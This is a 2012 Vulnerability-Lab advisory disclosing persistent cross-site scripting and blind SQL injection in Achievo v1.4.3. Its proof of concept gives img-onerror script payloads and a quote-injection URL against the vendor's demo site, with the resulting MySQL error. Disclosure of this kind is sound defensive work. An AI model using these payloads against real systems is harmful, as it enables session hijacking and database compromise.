133 lines
No EOL
4.4 KiB
Text
133 lines
No EOL
4.4 KiB
Text
Title:
|
||
======
|
||
Achievo v1.4.3 - Multiple Web Vulnerabilities
|
||
|
||
|
||
Date:
|
||
=====
|
||
2012-01-30
|
||
|
||
|
||
References:
|
||
===========
|
||
http://www.vulnerability-lab.com/get_content.php?id=403
|
||
|
||
|
||
VL-ID:
|
||
=====
|
||
403
|
||
|
||
|
||
Introduction:
|
||
=============
|
||
Achievo is a flexible web-based resource management tool for business environments.
|
||
Achievo s resource management capabilities will enable organisations to support their business
|
||
processes in a simple, but effective manner.
|
||
|
||
A solution that fits seamlessly to the wishes of every organisation and offers the possibility
|
||
and freedom to adapt the functionality to the needs of the organisation. It will fit into every
|
||
organisation because Achievo is extremly easy to change to your specific situation.
|
||
|
||
(Copy of the Vendor Website: http://www.achievo.nl/product/ )
|
||
|
||
|
||
Abstract:
|
||
=========
|
||
Vulnerability-Lab Team (Chokri B.A.) discovered Multiple Web Vulnerabilities on the resource management tool Achievo v1.4.3.
|
||
|
||
|
||
Report-Timeline:
|
||
================
|
||
2012-01-30: Public or Non-Public Disclosure
|
||
|
||
|
||
Status:
|
||
========
|
||
Published
|
||
|
||
|
||
Exploitation-Technique:
|
||
=======================
|
||
Remote
|
||
|
||
|
||
Severity:
|
||
=========
|
||
High
|
||
|
||
|
||
Details:
|
||
========
|
||
Multiple persistant cross site & a blind SQL vulnerabilities are detected on the resource management tool Achievo v1.4.3.
|
||
The bug allows remote attacker to implement malicious script code on the application side and/or to execute sql commands via
|
||
remote sql injection attack..
|
||
Successful exploitation of the vulnerability allows an attacker to manipulate specific modules & can
|
||
lead to session hijacking (user/mod/admin) and/or to compromise the application & dbms.
|
||
|
||
|
||
Vulnerable Module(s):
|
||
[+] Users preferences
|
||
[+] Projects
|
||
[+] Download vcard ( SQLi )
|
||
|
||
Picture(s):
|
||
../1.jpg
|
||
../2.jpg
|
||
|
||
|
||
Proof of Concept:
|
||
=================
|
||
The vulnerabilities can be exploited by remote attackers with low required user inter action. For demonstration or reproduce ...
|
||
|
||
1.
|
||
<select class="atkManyToOneRelation" name="atksearch_AE_coordinator_AE_coordinator[]"><option value="">Search all
|
||
</option><option value="__NONE__">Nothing selected</option><option value="1
|
||
" >"><img src=image.jpg onerror=alert(123); /> [X]
|
||
, test (manager)</option><option value="2" >
|
||
|
||
2.
|
||
<td valign="top" class="fieldlabel"><b>Project:</b> </td>
|
||
<td valign="top" class="field" >
|
||
"><img src: "><img src=image.jpg onerror=alert(1234); /> [X]
|
||
</td></tr>
|
||
|
||
3.
|
||
http://www.achievo.nl/demos/achievo/stable/dispatch.php?atkaction=vcard&atklevel=1&atkprevlevel=0&atkstackid=4f2467eae0518&id=3'
|
||
|
||
Critical: Unknown error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'contact') ORDER BY person.role, person.lastname' at line 1).
|
||
Halted
|
||
error: [+0.19090s / 0.00036s] Unknown error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'contact') ORDER BY person.role, person.lastname' at line 1)
|
||
Halted...
|
||
|
||
|
||
Risk:
|
||
=====
|
||
1.1
|
||
The security risk of the persistant xss vulnerabilities are estimated as medium(+).
|
||
|
||
1.2
|
||
The security risk of the blind sql injection vulnerabilities are estimated as high(+).
|
||
|
||
|
||
Credits:
|
||
========
|
||
Vulnerability Research Laboratory - Chokri B.A (Me!ster)
|
||
|
||
|
||
Disclaimer:
|
||
===========
|
||
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
|
||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
||
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
||
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
||
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
||
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
|
||
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
|
||
other media, are reserved by Vulnerability-Lab or its suppliers.
|
||
|
||
Copyright <20> 2012|Vulnerability-Lab
|
||
|
||
|
||
--
|
||
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
|
||
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com |